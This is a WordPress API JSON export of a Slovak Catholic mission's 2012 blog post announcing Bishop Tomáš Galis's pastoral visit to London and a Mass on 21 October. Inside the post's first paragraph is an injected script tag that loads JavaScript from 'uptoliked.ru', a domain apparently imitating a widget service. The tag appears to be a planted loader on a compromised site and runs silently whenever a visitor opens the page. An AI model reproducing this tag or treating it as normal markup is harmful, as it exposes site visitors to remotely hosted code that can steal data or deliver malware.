{"id":14653,"date":"2012-10-01T08:36:35","date_gmt":"2012-10-01T07:36:35","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=14653"},"modified":"2012-10-15T12:22:12","modified_gmt":"2012-10-15T11:22:12","slug":"navsteva-otca-biskupa-tomasa-v-scm","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=14653","title":{"rendered":"Pastora\u010dn\u00e1 n\u00e1v\u0161teva otca biskupa Mons. Tom\u00e1\u0161a Galisa v SCM"},"content":{"rendered":"<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/10\/Galis.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-thumbnail wp-image-14654\" title=\"\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/10\/Galis-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/a>Mil\u00ed priatelia,<\/p>\n<p style=\"text-align: justify;\">s rados\u0165ou v\u00e1m oznamujem, \u017ee na\u0161u misiu nav\u0161t\u00edvi \u017eilinsk\u00fd s\u00eddeln\u00fd biskup Mons. Tom\u00e1\u0161 Galis, PhD.<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/p>\n<p style=\"text-align: justify;\">Jeho n\u00e1v\u0161teva je spojen\u00e1 aj so stretnut\u00edm s westminstersk\u00fdm biskupom Alanom Hopesom, ktor\u00fd m\u00e1 na starosti zahrani\u010dn\u00e9 misie v diec\u00e9ze Westminster, kam patr\u00ed aj SCM.<\/p>\n<p>N\u00e1v\u0161teva sa uskuto\u010dn\u00ed v d\u0148och 19.-22. okt\u00f3bra 2012.<\/p>\n<p style=\"text-align: justify;\">Sl\u00e1vnostn\u00fa sv\u00e4t\u00fa om\u0161u bude o. biskup celebrova\u0165 v nede\u013eu 21. okt\u00f3bra 2012 v kostole na\u0161ej misie Our Lady of La Salette and St. Joseph o 13.00 hod.<\/p>\n<p>Srde\u010dne v\u00e1s v\u0161etk\u00fdch poz\u00fdvam!<\/p>\n<p>Fr Tibor<br \/>\nduchovn\u00fd spr\u00e1vca SCM<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mil\u00ed priatelia, s rados\u0165ou v\u00e1m oznamujem, \u017ee na\u0161u misiu nav\u0161t\u00edvi \u017eilinsk\u00fd s\u00eddeln\u00fd biskup Mons. Tom\u00e1\u0161 Galis, PhD. Jeho n\u00e1v\u0161teva je spojen\u00e1 aj so stretnut\u00edm s westminstersk\u00fdm biskupom Alanom Hopesom, ktor\u00fd&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=14653\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-14653","post","type-post","status-publish","format-standard","hentry","category-28"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/14653","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14653"}],"version-history":[{"count":5,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/14653\/revisions"}],"predecessor-version":[{"id":14723,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/14653\/revisions\/14723"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14653"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14653"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14653"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}